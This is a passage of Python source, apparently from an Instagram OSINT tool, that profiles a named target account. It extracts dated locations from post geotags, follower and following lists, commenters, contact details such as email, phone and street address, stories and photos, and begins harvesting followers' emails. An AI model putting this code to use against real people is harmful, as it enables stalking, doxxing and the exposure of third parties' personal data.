pc.printout(\" [PRIVATE PROFILE]\", pc.BLUE)\n if self.following:\n pc.printout(\" [FOLLOWING]\", pc.GREEN)\n else:\n pc.printout(\" [NOT FOLLOWING]\", pc.RED)\n\n print('\\n')\n\n def change_target(self):\n pc.printout(\"Insert new target username: \", pc.YELLOW)\n line = input()\n self.setTarget(line)\n return\n\n def get_addrs(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target localizations...\\n\")\n\n data = self.__get_feed__()\n\n locations = {}\n\n for post in data:\n if 'location' in post and post['location'] is not None:\n if 'lat' in post['location'] and 'lng' in post['location']:\n lat = post['location']['lat']\n lng = post['location']['lng']\n locations[str(lat) + ', ' + str(lng)] = post.get('taken_at')\n\n address = {}\n for k, v in locations.items():\n details = self.geolocator.reverse(k)\n unix_timestamp = datetime.datetime.fromtimestamp(v)\n address[details.address] = unix_timestamp.strftime('%Y-%m-%d %H:%M:%S')\n\n sort_addresses = sorted(address.items(), key=lambda p: p[1], reverse=True)\n\n if len(sort_addresses) > 0:\n t = PrettyTable()\n\n t.field_names = ['Post', 'Address', 'time']\n t.align[\"Post\"] = \"l\"\n t.align[\"Address\"] = \"l\"\n t.align[\"Time\"] = \"l\"\n pc.printout(\"\\nWoohoo! We found \" + str(len(sort_addresses)) + \" addresses\\n\", pc.GREEN)\n\n i = 1\n\n json_data = {}\n addrs_list = []\n\n for address, time in sort_addresses:\n t.add_row([str(i), address, time])\n\n if self.jsonDump:\n addr = {\n 'address': address,\n 'time': time\n }\n addrs_list.append(addr)\n\n i = i + 1\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_addrs.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['address'] = addrs_list\n json_file_name = self.output_dir + \"/\" + self.target + \"_addrs.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_captions(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target captions...\\n\")\n\n captions = []\n\n data = self.__get_feed__()\n counter = 0\n\n try:\n for item in data:\n if \"caption\" in item:\n if item[\"caption\"] is not None:\n text = item[\"caption\"][\"text\"]\n captions.append(text)\n counter = counter + 1\n sys.stdout.write(\"\\rFound %i\" % counter)\n sys.stdout.flush()\n\n except AttributeError:\n pass\n\n except KeyError:\n pass\n\n json_data = {}\n\n if counter > 0:\n pc.printout(\"\\nWoohoo! We found \" + str(counter) + \" captions\\n\", pc.GREEN)\n\n file = None\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_captions.txt\"\n file = open(file_name, \"w\")\n\n for s in captions:\n print(s + \"\\n\")\n\n if self.writeFile:\n file.write(s + \"\\n\")\n\n if self.jsonDump:\n json_data['captions'] = captions\n json_file_name = self.output_dir + \"/\" + self.target + \"_followings.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n if file is not None:\n file.close()\n\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n return\n\n def get_total_comments(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target total comments...\\n\")\n\n comments_counter = 0\n posts = 0\n\n data = self.__get_feed__()\n\n for post in data:\n comments_counter += post['comment_count']\n posts += 1\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_comments.txt\"\n file = open(file_name, \"w\")\n file.write(str(comments_counter) + \" comments in \" + str(posts) + \" posts\\n\")\n file.close()\n\n if self.jsonDump:\n json_data = {\n 'comment_counter': comments_counter,\n 'posts': posts\n }\n json_file_name = self.output_dir + \"/\" + self.target + \"_comments.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n pc.printout(str(comments_counter), pc.MAGENTA)\n pc.printout(\" comments in \" + str(posts) + \" posts\\n\")\n\n def get_comment_data(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Retrieving all comments, this may take a moment...\\n\")\n data = self.__get_feed__()\n \n _comments = []\n t = PrettyTable(['POST ID', 'ID', 'Username', 'Comment'])\n t.align[\"POST ID\"] = \"l\"\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Comment\"] = \"l\"\n\n for post in data:\n post_id = post.get('id')\n comments = self.api.media_n_comments(post_id)\n for comment in comments:\n t.add_row([post_id, comment.get('user_id'), comment.get('user').get('username'), comment.get('text')])\n comment = {\n \"post_id\": post_id,\n \"user_id\":comment.get('user_id'), \n \"username\": comment.get('user').get('username'),\n \"comment\": comment.get('text')\n }\n _comments.append(comment)\n \n print(t)\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_comment_data.txt\"\n with open(file_name, 'w') as f:\n f.write(str(t))\n f.close()\n \n if self.jsonDump:\n file_name_json = self.output_dir + \"/\" + self.target + \"_comment_data.json\"\n with open(file_name_json, 'w') as f:\n f.write(\"{ \\\"Comments\\\":[ \\n\")\n f.write('\\n'.join(json.dumps(comment) for comment in _comments) + ',\\n')\n f.write(\"]} \")\n\n\n def get_followers(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target followers...\\n\")\n\n _followers = []\n followers = []\n\n\n rank_token = AppClient.generate_uuid()\n data = self.api.user_followers(str(self.target_id), rank_token=rank_token)\n\n _followers.extend(data.get('users', []))\n\n next_max_id = data.get('next_max_id')\n while next_max_id:\n sys.stdout.write(\"\\rCatched %i followers\" % len(_followers))\n sys.stdout.flush()\n results = self.api.user_followers(str(self.target_id), rank_token=rank_token, max_id=next_max_id)\n _followers.extend(results.get('users', []))\n next_max_id = results.get('next_max_id')\n\n print(\"\\n\")\n \n for user in _followers:\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followers.append(u)\n\n t = PrettyTable(['ID', 'Username', 'Full Name'])\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n\n json_data = {}\n followings_list = []\n\n for node in followers:\n t.add_row([str(node['id']), node['username'], node['full_name']])\n\n if self.jsonDump:\n follow = {\n 'id': node['id'],\n 'username': node['username'],\n 'full_name': node['full_name']\n }\n followings_list.append(follow)\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_followers.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['followers'] = followers\n json_file_name = self.output_dir + \"/\" + self.target + \"_followers.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n\n def get_followings(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target followings...\\n\")\n\n _followings = []\n followings = []\n\n rank_token = AppClient.generate_uuid()\n data = self.api.user_following(str(self.target_id), rank_token=rank_token)\n\n _followings.extend(data.get('users', []))\n\n next_max_id = data.get('next_max_id')\n while next_max_id:\n sys.stdout.write(\"\\rCatched %i followings\" % len(_followings))\n sys.stdout.flush()\n results = self.api.user_following(str(self.target_id), rank_token=rank_token, max_id=next_max_id)\n _followings.extend(results.get('users', []))\n next_max_id = results.get('next_max_id')\n\n print(\"\\n\")\n\n for user in _followings:\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followings.append(u)\n\n t = PrettyTable(['ID', 'Username', 'Full Name'])\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n\n json_data = {}\n followings_list = []\n\n for node in followings:\n t.add_row([str(node['id']), node['username'], node['full_name']])\n\n if self.jsonDump:\n follow = {\n 'id': node['id'],\n 'username': node['username'],\n 'full_name': node['full_name']\n }\n followings_list.append(follow)\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_followings.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['followings'] = followings_list\n json_file_name = self.output_dir + \"/\" + self.target + \"_followings.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n\n def get_hashtags(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target hashtags...\\n\")\n\n hashtags = []\n counter = 1\n texts = []\n\n data = self.api.user_feed(str(self.target_id))\n texts.extend(data.get('items', []))\n\n next_max_id = data.get('next_max_id')\n while next_max_id:\n results = self.api.user_feed(str(self.target_id), max_id=next_max_id)\n texts.extend(results.get('items', []))\n next_max_id = results.get('next_max_id')\n\n for post in texts:\n if post['caption'] is not None:\n caption = post['caption']['text']\n for s in caption.split():\n if s.startswith('#'):\n hashtags.append(s.encode('UTF-8'))\n counter += 1\n\n if len(hashtags) > 0:\n hashtag_counter = {}\n\n for i in hashtags:\n if i in hashtag_counter:\n hashtag_counter[i] += 1\n else:\n hashtag_counter[i] = 1\n\n ssort = sorted(hashtag_counter.items(), key=lambda value: value[1], reverse=True)\n\n file = None\n json_data = {}\n hashtags_list = []\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_hashtags.txt\"\n file = open(file_name, \"w\")\n\n for k, v in ssort:\n hashtag = str(k.decode('utf-8'))\n print(str(v) + \". \" + hashtag)\n if self.writeFile:\n file.write(str(v) + \". \" + hashtag + \"\\n\")\n if self.jsonDump:\n hashtags_list.append(hashtag)\n\n if file is not None:\n file.close()\n\n if self.jsonDump:\n json_data['hashtags'] = hashtags_list\n json_file_name = self.output_dir + \"/\" + self.target + \"_hashtags.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_user_info(self):\n try:\n endpoint = 'users/{user_id!s}/full_detail_info/'.format(**{'user_id': self.target_id})\n content = self.api._call_api(endpoint)\n \n data = content['user_detail']['user']\n\n pc.printout(\"[ID] \", pc.GREEN)\n pc.printout(str(data['pk']) + '\\n')\n pc.printout(\"[FULL NAME] \", pc.RED)\n pc.printout(str(data['full_name']) + '\\n')\n pc.printout(\"[BIOGRAPHY] \", pc.CYAN)\n pc.printout(str(data['biography']) + '\\n')\n pc.printout(\"[FOLLOWED] \", pc.BLUE)\n pc.printout(str(data['follower_count']) + '\\n')\n pc.printout(\"[FOLLOW] \", pc.GREEN)\n pc.printout(str(data['following_count']) + '\\n')\n pc.printout(\"[BUSINESS ACCOUNT] \", pc.RED)\n pc.printout(str(data['is_business']) + '\\n')\n if data['is_business']:\n if not data['can_hide_category']:\n pc.printout(\"[BUSINESS CATEGORY] \")\n pc.printout(str(data['category']) + '\\n')\n pc.printout(\"[VERIFIED ACCOUNT] \", pc.CYAN)\n pc.printout(str(data['is_verified']) + '\\n')\n if 'public_email' in data and data['public_email']:\n pc.printout(\"[EMAIL] \", pc.BLUE)\n pc.printout(str(data['public_email']) + '\\n')\n pc.printout(\"[HD PROFILE PIC] \", pc.GREEN)\n pc.printout(str(data['hd_profile_pic_url_info']['url']) + '\\n')\n if 'fb_page_call_to_action_id' in data and data['fb_page_call_to_action_id']: \n pc.printout(\"[FB PAGE] \", pc.RED)\n pc.printout(str(data['connected_fb_page']) + '\\n')\n if 'whatsapp_number' in data and data['whatsapp_number']:\n pc.printout(\"[WHATSAPP NUMBER] \", pc.GREEN)\n pc.printout(str(data['whatsapp_number']) + '\\n')\n if 'city_name' in data and data['city_name']:\n pc.printout(\"[CITY] \", pc.YELLOW)\n pc.printout(str(data['city_name']) + '\\n')\n if 'address_street' in data and data['address_street']:\n pc.printout(\"[ADDRESS STREET] \", pc.RED)\n pc.printout(str(data['address_street']) + '\\n')\n if 'contact_phone_number' in data and data['contact_phone_number']:\n pc.printout(\"[CONTACT PHONE NUMBER] \", pc.CYAN)\n pc.printout(str(data['contact_phone_number']) + '\\n')\n\n if self.jsonDump:\n user = {\n 'id': data['pk'],\n 'full_name': data['full_name'],\n 'biography': data['biography'],\n 'edge_followed_by': data['follower_count'],\n 'edge_follow': data['following_count'],\n 'is_business_account': data['is_business'],\n 'is_verified': data['is_verified'],\n 'profile_pic_url_hd': data['hd_profile_pic_url_info']['url']\n }\n if 'public_email' in data and data['public_email']:\n user['email'] = data['public_email']\n if 'fb_page_call_to_action_id' in data and data['fb_page_call_to_action_id']: \n user['connected_fb_page'] = data['fb_page_call_to_action_id']\n if 'whatsapp_number' in data and data['whatsapp_number']:\n user['whatsapp_number'] = data['whatsapp_number']\n if 'city_name' in data and data['city_name']:\n user['city_name'] = data['city_name']\n if 'address_street' in data and data['address_street']:\n user['address_street'] = data['address_street']\n if 'contact_phone_number' in data and data['contact_phone_number']:\n user['contact_phone_number'] = data['contact_phone_number']\n\n json_file_name = self.output_dir + \"/\" + self.target + \"_info.json\"\n with open(json_file_name, 'w') as f:\n json.dump(user, f)\n\n except ClientError as e:\n print(e)\n pc.printout(\"Oops... \" + str(self.target) + \" non exist, please enter a valid username.\", pc.RED)\n pc.printout(\"\\n\")\n exit(2)\n\n def get_total_likes(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target total likes...\\n\")\n\n like_counter = 0\n posts = 0\n\n data = self.__get_feed__()\n\n for post in data:\n like_counter += post['like_count']\n posts += 1\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_likes.txt\"\n file = open(file_name, \"w\")\n file.write(str(like_counter) + \" likes in \" + str(like_counter) + \" posts\\n\")\n file.close()\n\n if self.jsonDump:\n json_data = {\n 'like_counter': like_counter,\n 'posts': like_counter\n }\n json_file_name = self.output_dir + \"/\" + self.target + \"_likes.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n pc.printout(str(like_counter), pc.MAGENTA)\n pc.printout(\" likes in \" + str(posts) + \" posts\\n\")\n\n def get_media_type(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target captions...\\n\")\n\n counter = 0\n photo_counter = 0\n video_counter = 0\n\n data = self.__get_feed__()\n\n for post in data:\n if \"media_type\" in post:\n if post[\"media_type\"] == 1:\n photo_counter = photo_counter + 1\n elif post[\"media_type\"] == 2:\n video_counter = video_counter + 1\n counter = counter + 1\n sys.stdout.write(\"\\rChecked %i\" % counter)\n sys.stdout.flush()\n\n sys.stdout.write(\" posts\")\n sys.stdout.flush()\n\n if counter > 0:\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_mediatype.txt\"\n file = open(file_name, \"w\")\n file.write(str(photo_counter) + \" photos and \" + str(video_counter) + \" video posted by target\\n\")\n file.close()\n\n pc.printout(\"\\nWoohoo! We found \" + str(photo_counter) + \" photos and \" + str(video_counter) +\n \" video posted by target\\n\", pc.GREEN)\n\n if self.jsonDump:\n json_data = {\n \"photos\": photo_counter,\n \"videos\": video_counter\n }\n json_file_name = self.output_dir + \"/\" + self.target + \"_mediatype.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_people_who_commented(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for users who commented...\\n\")\n\n data = self.__get_feed__()\n users = []\n\n for post in data:\n comments = self.__get_comments__(post['id'])\n for comment in comments:\n if not any(u['id'] == comment['user']['pk'] for u in users):\n user = {\n 'id': comment['user']['pk'],\n 'username': comment['user']['username'],\n 'full_name': comment['user']['full_name'],\n 'counter': 1\n }\n users.append(user)\n else:\n for user in users:\n if user['id'] == comment['user']['pk']:\n user['counter'] += 1\n break\n\n if len(users) > 0:\n ssort = sorted(users, key=lambda value: value['counter'], reverse=True)\n\n json_data = {}\n\n t = PrettyTable()\n\n t.field_names = ['Comments', 'ID', 'Username', 'Full Name']\n t.align[\"Comments\"] = \"l\"\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n\n for u in ssort:\n t.add_row([str(u['counter']), u['id'], u['username'], u['full_name']])\n\n print(t)\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_users_who_commented.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['users_who_commented'] = ssort\n json_file_name = self.output_dir + \"/\" + self.target + \"_users_who_commented.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_people_who_tagged(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for users who tagged target...\\n\")\n\n posts = []\n\n result = self.api.usertag_feed(self.target_id)\n posts.extend(result.get('items', []))\n\n next_max_id = result.get('next_max_id')\n while next_max_id:\n results = self.api.user_feed(str(self.target_id), max_id=next_max_id)\n posts.extend(results.get('items', []))\n next_max_id = results.get('next_max_id')\n\n if len(posts) > 0:\n pc.printout(\"\\nWoohoo! We found \" + str(len(posts)) + \" photos\\n\", pc.GREEN)\n\n users = []\n\n for post in posts:\n if not any(u['id'] == post['user']['pk'] for u in users):\n user = {\n 'id': post['user']['pk'],\n 'username': post['user']['username'],\n 'full_name': post['user']['full_name'],\n 'counter': 1\n }\n users.append(user)\n else:\n for user in users:\n if user['id'] == post['user']['pk']:\n user['counter'] += 1\n break\n\n ssort = sorted(users, key=lambda value: value['counter'], reverse=True)\n\n json_data = {}\n\n t = PrettyTable()\n\n t.field_names = ['Photos', 'ID', 'Username', 'Full Name']\n t.align[\"Photos\"] = \"l\"\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n\n for u in ssort:\n t.add_row([str(u['counter']), u['id'], u['username'], u['full_name']])\n\n print(t)\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_users_who_tagged.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['users_who_tagged'] = ssort\n json_file_name = self.output_dir + \"/\" + self.target + \"_users_who_tagged.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_photo_description(self):\n if self.check_private_profile():\n return\n\n content = requests.get(\"https://www.instagram.com/\" + str(self.target) + \"/?__a=1\")\n data = content.json()\n\n dd = data['graphql']['user']['edge_owner_to_timeline_media']['edges']\n\n if len(dd) > 0:\n pc.printout(\"\\nWoohoo! We found \" + str(len(dd)) + \" descriptions\\n\", pc.GREEN)\n\n count = 1\n\n t = PrettyTable(['Photo', 'Description'])\n t.align[\"Photo\"] = \"l\"\n t.align[\"Description\"] = \"l\"\n\n json_data = {}\n descriptions_list = []\n\n for i in dd:\n node = i.get('node')\n descr = node.get('accessibility_caption')\n t.add_row([str(count), descr])\n\n if self.jsonDump:\n description = {\n 'description': descr\n }\n descriptions_list.append(description)\n\n count += 1\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_photodes.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['descriptions'] = descriptions_list\n json_file_name = self.output_dir + \"/\" + self.target + \"_descriptions.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_user_photo(self):\n if self.check_private_profile():\n return\n\n limit = -1\n if self.cli_mode:\n user_input = \"\"\n else:\n pc.printout(\"How many photos you want to download (default all): \", pc.YELLOW)\n user_input = input()\n \n try:\n if user_input == \"\":\n pc.printout(\"Downloading all photos available...\\n\")\n else:\n limit = int(user_input)\n pc.printout(\"Downloading \" + user_input + \" photos...\\n\")\n\n except ValueError:\n pc.printout(\"Wrong value entered\\n\", pc.RED)\n return\n\n data = []\n counter = 0\n\n result = self.api.user_feed(str(self.target_id))\n data.extend(result.get('items', []))\n\n next_max_id = result.get('next_max_id')\n while next_max_id:\n results = self.api.user_feed(str(self.target_id), max_id=next_max_id)\n data.extend(results.get('items', []))\n next_max_id = results.get('next_max_id')\n\n try:\n for item in data:\n if counter == limit:\n break\n if \"image_versions2\" in item:\n counter = counter + 1\n url = item[\"image_versions2\"][\"candidates\"][0][\"url\"]\n photo_id = item[\"id\"]\n end = self.output_dir + \"/\" + self.target + \"_\" + photo_id + \".jpg\"\n urllib.request.urlretrieve(url, end)\n sys.stdout.write(\"\\rDownloaded %i\" % counter)\n sys.stdout.flush()\n else:\n carousel = item[\"carousel_media\"]\n for i in carousel:\n if counter == limit:\n break\n counter = counter + 1\n url = i[\"image_versions2\"][\"candidates\"][0][\"url\"]\n photo_id = i[\"id\"]\n end = self.output_dir + \"/\" + self.target + \"_\" + photo_id + \".jpg\"\n urllib.request.urlretrieve(url, end)\n sys.stdout.write(\"\\rDownloaded %i\" % counter)\n sys.stdout.flush()\n\n except AttributeError:\n pass\n\n except KeyError:\n pass\n\n sys.stdout.write(\" photos\")\n sys.stdout.flush()\n\n pc.printout(\"\\nWoohoo! We downloaded \" + str(counter) + \" photos (saved in \" + self.output_dir + \" folder) \\n\", pc.GREEN)\n\n def get_user_propic(self):\n\n try:\n endpoint = 'users/{user_id!s}/full_detail_info/'.format(**{'user_id': self.target_id})\n content = self.api._call_api(endpoint)\n\n data = content['user_detail']['user']\n\n if \"hd_profile_pic_url_info\" in data:\n URL = data[\"hd_profile_pic_url_info\"]['url']\n else:\n #get better quality photo\n items = len(data['hd_profile_pic_versions'])\n URL = data[\"hd_profile_pic_versions\"][items-1]['url']\n\n if URL != \"\":\n end = self.output_dir + \"/\" + self.target + \"_propic.jpg\"\n urllib.request.urlretrieve(URL, end)\n pc.printout(\"Target propic saved in output folder\\n\", pc.GREEN)\n\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n \n except ClientError as e:\n error = json.loads(e.error_response)\n print(error['message'])\n print(error['error_title'])\n exit(2)\n\n def get_user_stories(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target stories...\\n\")\n\n data = self.api.user_reel_media(str(self.target_id))\n\n counter = 0\n\n if data['items'] is not None: # no stories avaibile\n counter = data['media_count']\n for i in data['items']:\n story_id = i[\"id\"]\n if i[\"media_type\"] == 1: # it's a photo\n url = i['image_versions2']['candidates'][0]['url']\n end = self.output_dir + \"/\" + self.target + \"_\" + story_id + \".jpg\"\n urllib.request.urlretrieve(url, end)\n\n elif i[\"media_type\"] == 2: # it's a gif or video\n url = i['video_versions'][0]['url']\n end = self.output_dir + \"/\" + self.target + \"_\" + story_id + \".mp4\"\n urllib.request.urlretrieve(url, end)\n\n if counter > 0:\n pc.printout(str(counter) + \" target stories saved in output folder\\n\", pc.GREEN)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_people_tagged_by_user(self):\n pc.printout(\"Searching for users tagged by target...\\n\")\n\n ids = []\n username = []\n full_name = []\n post = []\n counter = 1\n\n data = self.__get_feed__()\n\n try:\n for i in data:\n if \"usertags\" in i:\n c = i.get('usertags').get('in')\n for cc in c:\n if cc.get('user').get('pk') not in ids:\n ids.append(cc.get('user').get('pk'))\n username.append(cc.get('user').get('username'))\n full_name.append(cc.get('user').get('full_name'))\n post.append(1)\n else:\n index = ids.index(cc.get('user').get('pk'))\n post[index] += 1\n counter = counter + 1\n except AttributeError as ae:\n pc.printout(\"\\nERROR: an error occurred: \", pc.RED)\n print(ae)\n print(\"\")\n pass\n\n if len(ids) > 0:\n t = PrettyTable()\n\n t.field_names = ['Posts', 'Full Name', 'Username', 'ID']\n t.align[\"Posts\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"ID\"] = \"l\"\n\n pc.printout(\"\\nWoohoo! We found \" + str(len(ids)) + \" (\" + str(counter) + \") users\\n\", pc.GREEN)\n\n json_data = {}\n tagged_list = []\n\n for i in range(len(ids)):\n t.add_row([post[i], full_name[i], username[i], str(ids[i])])\n\n if self.jsonDump:\n tag = {\n 'post': post[i],\n 'full_name': full_name[i],\n 'username': username[i],\n 'id': ids[i]\n }\n tagged_list.append(tag)\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_tagged.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['tagged'] = tagged_list\n json_file_name = self.output_dir + \"/\" + self.target + \"_tagged.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_user(self, username):\n try:\n content = self.api.username_info(username)\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_user_id.txt\"\n file = open(file_name, \"w\")\n file.write(str(content['user']['pk']))\n file.close()\n\n user = dict()\n user['id'] = content['user']['pk']\n user['is_private'] = content['user']['is_private']\n\n return user\n except ClientError as e:\n pc.printout('ClientError {0!s} (Code: {1:d}, Response: {2!s})'.format(e.msg, e.code, e.error_response), pc.RED)\n error = json.loads(e.error_response)\n if 'message' in error:\n print(error['message'])\n if 'error_title' in error:\n print(error['error_title'])\n if 'challenge' in error:\n print(\"Please follow this link to complete the challenge: \" + error['challenge']['url']) \n sys.exit(2)\n \n\n def set_write_file(self, flag):\n if flag:\n pc.printout(\"Write to file: \")\n pc.printout(\"enabled\", pc.GREEN)\n pc.printout(\"\\n\")\n else:\n pc.printout(\"Write to file: \")\n pc.printout(\"disabled\", pc.RED)\n pc.printout(\"\\n\")\n\n self.writeFile = flag\n\n def set_json_dump(self, flag):\n if flag:\n pc.printout(\"Export to JSON: \")\n pc.printout(\"enabled\", pc.GREEN)\n pc.printout(\"\\n\")\n else:\n pc.printout(\"Export to JSON: \")\n pc.printout(\"disabled\", pc.RED)\n pc.printout(\"\\n\")\n\n self.jsonDump = flag\n\n def login(self, u, p):\n try:\n settings_file = \"config/settings.json\"\n if not os.path.isfile(settings_file):\n # settings file does not exist\n print(f'Unable to find file: {settings_file!s}')\n\n # login new\n self.api = AppClient(auto_patch=True, authenticate=True, username=u, password=p,\n on_login=lambda x: self.onlogin_callback(x, settings_file))\n\n else:\n with open(settings_file) as file_data:\n cached_settings = json.load(file_data, object_hook=self.from_json)\n # print('Reusing settings: {0!s}'.format(settings_file))\n\n # reuse auth settings\n self.api = AppClient(\n username=u, password=p,\n settings=cached_settings,\n on_login=lambda x: self.onlogin_callback(x, settings_file))\n\n except (ClientCookieExpiredError, ClientLoginRequiredError) as e:\n print(f'ClientCookieExpiredError/ClientLoginRequiredError: {e!s}')\n\n # Login expired\n # Do relogin but use default ua, keys and such\n self.api = AppClient(auto_patch=True, authenticate=True, username=u, password=p,\n on_login=lambda x: self.onlogin_callback(x, settings_file))\n\n except ClientError as e:\n pc.printout('ClientError {0!s} (Code: {1:d}, Response: {2!s})'.format(e.msg, e.code, e.error_response), pc.RED)\n error = json.loads(e.error_response)\n pc.printout(error['message'], pc.RED)\n pc.printout(\": \", pc.RED)\n pc.printout(e.msg, pc.RED)\n pc.printout(\"\\n\")\n if 'challenge' in error:\n print(\"Please follow this link to complete the challenge: \" + error['challenge']['url'])\n exit(9)\n\n def to_json(self, python_object):\n if isinstance(python_object, bytes):\n return {'__class__': 'bytes',\n '__value__': codecs.encode(python_object, 'base64').decode()}\n raise TypeError(repr(python_object) + ' is not JSON serializable')\n\n def from_json(self, json_object):\n if '__class__' in json_object and json_object['__class__'] == 'bytes':\n return codecs.decode(json_object['__value__'].encode(), 'base64')\n return json_object\n\n def onlogin_callback(self, api, new_settings_file):\n cache_settings = api.settings\n with open(new_settings_file, 'w') as outfile:\n json.dump(cache_settings, outfile, default=self.to_json)\n # print('SAVED: {0!s}'.format(new_settings_file))\n\n def check_following(self):\n if str(self.target_id) == self.api.authenticated_user_id:\n return True\n endpoint = 'users/{user_id!s}/full_detail_info/'.format(**{'user_id': self.target_id})\n return self.api._call_api(endpoint)['user_detail']['user']['friendship_status']['following']\n\n def check_private_profile(self):\n if self.is_private and not self.following:\n pc.printout(\"Impossible to execute command: user has private profile\\n\", pc.RED)\n send = input(\"Do you want send a follow request? [Y/N]: \")\n if send.lower() == \"y\":\n self.api.friendships_create(self.target_id)\n print(\"Sent a follow request to target. Use this command after target accepting the request.\")\n\n return True\n return False\n\n def get_fwersemail(self):\n if self.check_private_profile():\n return\n\n followers = []\n \n try:\n\n pc.printout(\"Searching for emails of target followers... this can take a few minutes\\n\")\n\n rank_token = AppClient.generate_uuid()\n data = self.api.user_followers(str(self.target_id), rank_token=rank_token)\n\n for user in data.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followers.append(u)\n\n next_max_id = data.get('next_max_id')\n while next_max_id:\n sys.stdout.write(\"\\rCatched %i followers email\" % len(followers))\n sys.stdout.flush()\n results = self.api.user_followers(str(self.target_id), rank_token=rank_token, max_id=next_max_id)\n \n for user in results.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followers.append(u)\n\n next_max_id = results.get('next_max_id')\n \n print(\"\\n\")\n\n results = []\n \n pc.printout(\"Do you want to get all emails? y/n: \", pc.YELLOW)\n value = input()\n \n if value == str(\"y\") or value == str(\"yes\") or value == str(\"Yes\") or value == str(\"YES\"):\n value = len(followers)\n elif value == str(\"\"):\n print(\"\\n\")\n return\n elif value == str(\"n\") or value == str(\"no\") or value == str(\"No\") or value == str(\"NO\"):\n while True:\n try:\n pc.printout(\"How many emails do you want to get? \", pc.YELLOW)\n new_value = int(input())\n value = new_value - 1\n break\n except ValueError:\n pc.printout(\"Error! Please enter a valid integer!\", pc.RED)\n print(\"\\n\")\n return\n else:\n pc.printout(\"Error! Please enter y/n :-)\", pc.RED)\n print(\"\\n\")\n return\n\n for follow in followers:\n user = self.api.user_info(str(follow['id']))\n if 